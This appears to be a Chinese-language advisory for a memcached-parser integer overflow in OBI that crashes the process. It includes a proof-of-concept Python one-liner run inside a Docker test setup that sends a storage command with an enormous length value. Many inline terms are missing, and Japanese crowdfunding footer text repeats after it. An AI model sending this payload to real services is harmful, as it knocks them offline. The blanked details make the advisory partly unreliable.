OBI Memcached Protocol Integer Overflow DoS (CVE-2025-4568)

漏洞概述 Memcached payload length overflow can crash OBI 漏洞描述：在OBI的memcached文本协议解析器中存在一个可远程触发的整数溢出漏洞，可能导致OBI进程崩溃并引发拒绝服务（DoS）。 漏洞详情： - 当解析memcached存储命令（如 、 、 、 、 或 ）时，OBI接受极大的 值，并在检查溢出之前添加有效负载分隔符长度。 - 如果 设置为 或 ，计算出的有效负载长度会回绕为负数，并在 中触发运行时恐慌。 - 问题出现在 中的memcached请求解析器。 影响范围 受影响版本： 修复版本： CVSS v3基础指标： - 攻击向量：网络 - 攻击复杂度：低 - 所需特权：无 - 用户交互：无 - 范围：未改变 - 机密性：无 - 完整性：无 - 可用性：高 CVE ID：CVE-2025-4568 修复方案 修复版本：升级到 或更高版本。 POC代码 利用步骤 1. 启动memcached环境： 2. 确认环境工作正常： 3. 发送特制的memcached存储命令： ```bash docker compose \ -f internal/test/oats/memcached/docker-compose-include-base.yml \ -f internal/test/oats/memcached/docker-compose-obi-python-memcached.yml \ exec testserver \ python -c 'import socket; s=socket.create_connection(["memcached",11211], timeout=5); s.sendall(b"set crash 0 0 1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

目標達成すべての支援者に感謝 — 100%達成しました！

OBI Memcached Protocol Integer Overflow DoS (CVE-2025-4568)

このソースからの他の記事

目標達成 すべての支援者に感謝 — 100%達成しました！

OBI Memcached Protocol Integer Overflow DoS (CVE-2025-4568)

このソースからの他の記事

目標達成すべての支援者に感謝 — 100%達成しました！